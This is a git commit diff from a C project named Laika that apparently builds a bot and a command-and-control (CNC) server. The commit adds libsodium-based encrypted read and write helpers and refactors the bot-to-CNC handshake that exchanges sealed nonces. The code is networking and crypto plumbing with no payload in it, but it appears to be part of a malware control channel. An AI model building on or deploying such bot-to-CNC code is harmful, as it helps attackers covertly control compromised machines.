Added laikaS_readENC laikaS_writeENC, minor refactoring

2024-11-21 12:40:04 +00:00 · 2022-01-29 00:26:15 -06:00 · 2022-01-29 00:26:15 -06:00 · 56c6db1d62
commit 56c6db1d62
parent 8627f5b85d
8 changed files with 43 additions and 24 deletions
--- a/bot/src/bot.c
+++ b/bot/src/bot.c
@ -4,7 +4,7 @@
 #include "bot.h"

 LAIKAPKT_SIZE laikaB_pktSizeTbl[LAIKAPKT_MAXNONE] = {
-    [LAIKAPKT_HANDSHAKE_RES] = sizeof(uint8_t) + crypto_box_SEALBYTES + LAIKA_NONCESIZE
+    [LAIKAPKT_HANDSHAKE_RES] = sizeof(uint8_t) + LAIKAENC_SIZE(LAIKA_NONCESIZE)
 };

 void laikaB_pktHandler(struct sLaika_peer *peer, LAIKAPKT_ID id, void *uData) {
@ -12,12 +12,12 @@ void laikaB_pktHandler(struct sLaika_peer *peer, LAIKAPKT_ID id, void *uData) {

    switch (id) {
        case LAIKAPKT_HANDSHAKE_RES: {
-            uint8_t encNonce[crypto_box_SEALBYTES + LAIKA_NONCESIZE], nonce[LAIKA_NONCESIZE];
+            uint8_t encNonce[LAIKAENC_SIZE(LAIKA_NONCESIZE)], nonce[LAIKA_NONCESIZE];
            uint8_t endianness = laikaS_readByte(&peer->sock);

            /* read & decrypt nonce */
            laikaS_read(&peer->sock, encNonce, sizeof(encNonce));
-            if (crypto_box_seal_open(nonce, encNonce, crypto_box_SEALBYTES + LAIKA_NONCESIZE, bot->pub, bot->priv) != 0)
+            if (crypto_box_seal_open(nonce, encNonce, LAIKAENC_SIZE(LAIKA_NONCESIZE), bot->pub, bot->priv) != 0)
                LAIKA_ERROR("Failed to decrypt nonce!\n");

            /* check nonce */
@ -57,6 +57,7 @@ struct sLaika_bot *laikaB_newBot(void) {
        LAIKA_ERROR("Failed to gen keypair!\n");
    }

+    /* read cnc's public key into peerPub */
    if (sodium_hex2bin(bot->peer->peerPub, crypto_box_PUBLICKEYBYTES, LAIKA_PUBKEY, strlen(LAIKA_PUBKEY), NULL, &_unused, NULL) != 0) {
        laikaB_freeBot(bot);
        LAIKA_ERROR("Failed to init cnc public key!\n");
@ -74,7 +75,6 @@ void laikaB_freeBot(struct sLaika_bot *bot) {
 }

 void laikaB_connectToCNC(struct sLaika_bot *bot, char *ip, char *port) {
-    uint8_t encNonce[crypto_box_SEALBYTES + LAIKA_NONCESIZE];
    struct sLaika_socket *sock = &bot->peer->sock;

    /* setup socket */
@ -83,16 +83,12 @@ void laikaB_connectToCNC(struct sLaika_bot *bot, char *ip, char *port) {

    laikaP_addSock(&bot->pList, sock);

-    /* encrypt nonce using cnc's pubkey */
-    if (crypto_box_seal(encNonce, bot->nonce, sizeof(bot->nonce), bot->peer->peerPub) != 0)
-        LAIKA_ERROR("Failed to enc nonce!\n");
-
    /* queue handshake request */
    laikaS_writeByte(sock, LAIKAPKT_HANDSHAKE_REQ);
    laikaS_write(sock, LAIKA_MAGIC, LAIKA_MAGICLEN);
    laikaS_writeByte(sock, LAIKA_VERSION_MAJOR);
    laikaS_writeByte(sock, LAIKA_VERSION_MINOR);
-    laikaS_write(sock, encNonce, sizeof(encNonce)); /* write encrypted nonce test */
+    laikaS_writeENC(sock, bot->nonce, LAIKA_NONCESIZE, bot->peer->peerPub); /* write encrypted nonce test */
    laikaS_write(sock, bot->pub, sizeof(bot->pub)); /* write public key */

    if (!laikaS_handlePeerOut(bot->peer))
--- a/bot/src/main.c
+++ b/bot/src/main.c
@ -12,11 +12,11 @@ int main(int argv, char **argc) {
    /* while connection is still alive, poll bot */
    while (laikaS_isAlive((&bot->peer->sock))) {
        if (!laikaB_poll(bot, 1000)) {
-            printf("no events!\n");
+            LAIKA_DEBUG("no events!\n");
        }
    }

    laikaB_freeBot(bot);
-    printf("bot killed\n");
+    LAIKA_DEBUG("bot killed\n");
    return 0;
 }
--- a/cnc/src/cnc.c
+++ b/cnc/src/cnc.c
@ -6,7 +6,7 @@
 #include "cnc.h"

 LAIKAPKT_SIZE laikaC_pktSizeTbl[LAIKAPKT_MAXNONE] = {
-    [LAIKAPKT_HANDSHAKE_REQ] = LAIKA_MAGICLEN + sizeof(uint8_t) + sizeof(uint8_t) + crypto_box_SEALBYTES + LAIKA_NONCESIZE + crypto_box_PUBLICKEYBYTES
+    [LAIKAPKT_HANDSHAKE_REQ] = LAIKA_MAGICLEN + sizeof(uint8_t) + sizeof(uint8_t) + LAIKAENC_SIZE(LAIKA_NONCESIZE) + crypto_box_PUBLICKEYBYTES
 };

 void laikaC_pktHandler(struct sLaika_peer *peer, LAIKAPKT_ID id, void *uData) {
@ -15,7 +15,7 @@ void laikaC_pktHandler(struct sLaika_peer *peer, LAIKAPKT_ID id, void *uData) {
    switch (id) {
        case LAIKAPKT_HANDSHAKE_REQ: {
            char magicBuf[LAIKA_MAGICLEN];
-            uint8_t encNonce[crypto_box_SEALBYTES + LAIKA_NONCESIZE], nonce[LAIKA_NONCESIZE];
+            uint8_t nonce[LAIKA_NONCESIZE];
            uint8_t major, minor;

            laikaS_read(&peer->sock, (void*)magicBuf, LAIKA_MAGICLEN);
@ -28,21 +28,15 @@ void laikaC_pktHandler(struct sLaika_peer *peer, LAIKAPKT_ID id, void *uData) {
                LAIKA_ERROR("invalid handshake request!\n");

             /* read & decrypt nonce */
-            laikaS_read(&peer->sock, encNonce, sizeof(encNonce));
-            if (crypto_box_seal_open(nonce, encNonce, sizeof(encNonce), cnc->pub, cnc->priv) != 0)
-                LAIKA_ERROR("Failed to decrypt nonce!\n");
+            laikaS_readENC(&peer->sock, nonce, LAIKA_NONCESIZE, cnc->pub, cnc->priv);

            /* read peer's public key */
            laikaS_read(&peer->sock, peer->peerPub, sizeof(peer->peerPub));

-            /* encrypt decrypted nonce with peer's pub key */
-            if (crypto_box_seal(encNonce, nonce, sizeof(nonce), peer->peerPub) != 0)
-                LAIKA_ERROR("Failed to enc nonce!\n");
-
            /* queue response */
            laikaS_writeByte(&peer->sock, LAIKAPKT_HANDSHAKE_RES);
            laikaS_writeByte(&peer->sock, laikaS_isBigEndian());
-            laikaS_write(&peer->sock, encNonce, sizeof(encNonce));
+            laikaS_writeENC(&peer->sock, nonce, LAIKA_NONCESIZE, peer->peerPub); /* encrypt nonce with peer's public key */

            LAIKA_DEBUG("accepted handshake from peer %x\n", peer);
            break;
--- a/lib/include/lpacket.h
+++ b/lib/include/lpacket.h
@ -14,15 +14,19 @@ enum {
    *   uint8_t laikaMagic[LAIKA_MAGICLEN];
    *   uint8_t majorVer;
    *   uint8_t minorVer;
-    *   uint8_t encNonce[crypto_box_SEALBYTES + LAIKA_NONCESIZE]; -- encrypted using shared pubKey
+    *   uint8_t encNonce[LAIKAENC_SIZE(LAIKA_NONCESIZE)]; -- encrypted using shared pubKey
    *   uint8_t pubKey[crypto_box_PUBLICKEYBYTES]; -- freshly generated pubKey to encrypt decrypted nonce with
    */
    LAIKAPKT_HANDSHAKE_RES,
    /* layout of LAIKAPKT_HANDSHAKE_RES:
    *   uint8_t endian;
-    *   uint8_t reEncryptedNonce[crypto_box_SEALBYTES + LAIKA_NONCESIZE]; -- encrypted using received pubKey from LAIKAPKT_AUTH_REQ pkt
+    *   uint8_t reEncryptedNonce[LAIKAENC_SIZE(LAIKA_NONCESIZE)]; -- encrypted using received pubKey from LAIKAPKT_AUTH_REQ pkt
    */
    LAIKAPKT_VARPKT_REQ,
+    /* layout of LAIKAPKT_VARPKT_REQ:
+    *   uint8_t pktID;
+    *   uint16_t pktSize;
+    */
    LAIKAPKT_MAXNONE
 };

--- a/lib/include/lrsa.h
+++ b/lib/include/lrsa.h
@ -3,4 +3,6 @@

 #include "sodium.h"

+#define LAIKAENC_SIZE(sz) (sz + crypto_box_SEALBYTES)
+
 #endif
--- a/lib/include/lsocket.h
+++ b/lib/include/lsocket.h
@ -86,6 +86,8 @@ bool laikaS_setNonBlock(struct sLaika_socket *sock);

 void laikaS_read(struct sLaika_socket *sock, void *buf, size_t sz); /* reads from inBuf */
 void laikaS_write(struct sLaika_socket *sock, void *buf, size_t sz); /* writes to outBuf */
+void laikaS_writeENC(struct sLaika_socket *sock, void *buf, size_t sz, uint8_t *pub); /* encrypts & writes from buf */
+void laikaS_readENC(struct sLaika_socket *sock, void *buf, size_t sz, uint8_t *pub, uint8_t *priv); /* decrypts & reads to buf */
 void laikaS_writeByte(struct sLaika_socket *sock, uint8_t data);
 uint8_t laikaS_readByte(struct sLaika_socket *sock);
 void laikaS_readInt(struct sLaika_socket *sock, void *buf, size_t sz); /* reads INT, respecting endianness */
--- a/lib/src/lpeer.c
+++ b/lib/src/lpeer.c
@ -58,9 +58,10 @@ bool laikaS_handlePeerIn(struct sLaika_peer *peer) {
            if (recvd != sizeof(uint8_t) + sizeof(LAIKAPKT_SIZE))
                LAIKA_ERROR("couldn't read whole LAIKAPKT_VARPKT_REQ")

+            /* read pktID */
            peer->pktID = laikaS_readByte(&peer->sock);

-            /* sanity check packet ID, (check valid range, check it's variadic) */
+            /* sanity check pktID, (check valid range, check it's variadic) */
            if (peer->pktID >= LAIKAPKT_MAXNONE || peer->pktSizeTable[peer->pktID])
                LAIKA_ERROR("received evil pktID!\n")

--- a/lib/src/lsocket.c
+++ b/lib/src/lsocket.c
@ -3,6 +3,7 @@
 #include "lerror.h"
 #include "lmem.h"
 #include "lpolllist.h"
+#include "lrsa.h"
 #include "lsocket.h"

 static int _LNSetup = 0;
@ -184,6 +185,25 @@ void laikaS_write(struct sLaika_socket *sock, void *buf, size_t sz) {
    sock->outCount += sz;
 }

+void laikaS_writeENC(struct sLaika_socket *sock, void *buf, size_t sz, uint8_t *pub) {
+    /* make sure we have enough space to encrypt the buffer */
+    laikaM_growarray(uint8_t, sock->outBuf, LAIKAENC_SIZE(sz), sock->outCount, sock->outCap);
+
+    /* encrypt the buffer into outBuf */
+    if (crypto_box_seal(&sock->outBuf[sock->outCount], buf, sz, pub) != 0)
+        LAIKA_ERROR("Failed to encrypt!");
+
+    sock->outCount += LAIKAENC_SIZE(sz);
+}
+
+void laikaS_readENC(struct sLaika_socket *sock, void *buf, size_t sz, uint8_t *pub, uint8_t *priv) {
+    /* decrypt into buf */
+    if (crypto_box_seal_open(buf, sock->inBuf, LAIKAENC_SIZE(sz), pub, priv) != 0)
+        LAIKA_ERROR("Failed to decrypt!");
+
+    laikaM_rmvarray(uint8_t, sock->inBuf, sock->inCount, 0, LAIKAENC_SIZE(sz));
+}
+
 void laikaS_writeByte(struct sLaika_socket *sock, uint8_t data) {
    laikaM_growarray(uint8_t, sock->outBuf, 1, sock->outCount, sock->outCap);
    sock->outBuf[sock->outCount++] = data;